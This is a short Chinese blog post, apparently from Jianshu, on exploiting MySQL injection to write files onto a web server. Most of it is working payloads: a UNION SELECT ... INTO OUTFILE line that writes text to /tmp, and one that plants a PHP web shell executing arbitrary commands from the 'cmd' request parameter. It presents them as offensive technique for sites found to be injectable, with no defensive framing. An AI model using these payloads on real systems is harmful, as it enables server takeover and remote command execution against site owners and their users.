Mysql数据库注入

1、如果发现一个网站存在注入,而且权限够大。那么,可以通过写一句话木马到服务器上去,但是你必须知道web应用程序在服务器上的路径。

通过INTO OUTFILE写文件

union select ‘TEXT INTO FILE’,2,3 INTO OUTFILE ‘/tmp/blah.txt’

#字符串‘TEXT INTO FILE’将会被存储在目录/tmp下的blah.txt中。

union select “<?system($_REQUEST['cmd']); ?>”,2,3 INTO OUTFILE ‘/var/www/test/execcmd.php’

#直接将一句话写入到.php文件中去。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容